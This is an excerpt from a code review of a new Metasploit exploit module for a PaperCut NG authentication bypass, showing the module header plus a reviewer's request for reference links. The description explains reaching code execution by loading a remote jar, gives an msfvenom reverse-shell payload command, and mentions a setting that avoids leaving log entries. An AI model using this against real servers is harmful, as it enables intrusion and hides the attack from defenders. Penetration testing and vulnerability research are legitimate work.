modules/exploits/multi/http/papercut_ng_auth_bypass.rb

```diff
@@ -0,0 +1,282 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'debug'
+require 'cgi'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PaperCut PaperCutNG Authentication Bypass',
+        'Description' => %q{
+          This module leverages an authentication bypass in PaperCut NG. If necessary it
+          updates Papercut configuration options, specifically the 'print-and-device.script.enabled'
+          and 'print.script.sandboxed' options to allow for arbitrary code execution running in
+          the builtin RhinoJS engine.
+
+          For code injection we utilize the URLClassLoader to load a remote URL containing a
+          ".jar" file, this file must already exist and must contain a "main" method accepting
+          no command line arguments. We recommend generating this jar file using msfvenom with a
+          java/meterpreter/reverse_tcp payload, e.g. `msfvenom -p java/meterpreter/reverse_tcp --format jar --encoder generic/none
+          LHOST=[lhost] LPORT=[lport] -o shell.jar
+
+          This module logs at most 2 events in the application log of papercut. Each event is tied
+          to modifcation of server settings. Use NEVER_SET to avoid log generation entirely when
+          targeting already vulnerable systes.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'catatonicprime' ],
+        'References' => [
+          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
```

Comment:
Add:
https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/
https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

Reply:
done in: https://github.com/rapid7/metasploit-framework/pull/17936/commits/22238a0860811dd54e808daad1c42f34b7a533d2